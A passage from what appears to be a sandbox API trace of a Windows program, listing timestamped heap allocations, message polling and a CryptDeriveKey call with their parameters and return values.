Size=0x10) returned 0x2e50ab8 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0148.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cb0 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0148.666] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0148.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0148.667] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c68 [0148.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0148.668] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0148.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0148.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0148.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0148.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0148.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509e0 [0148.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0148.672] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87090, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87710) returned 1 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0148.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0148.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0148.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0148.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0148.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0148.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0148.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0148.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0148.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0148.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0148.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0148.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0148.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0148.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0148.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0148.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0148.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0148.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0148.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0148.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0148.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0148.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0148.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0148.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0148.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0148.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0148.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0148.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 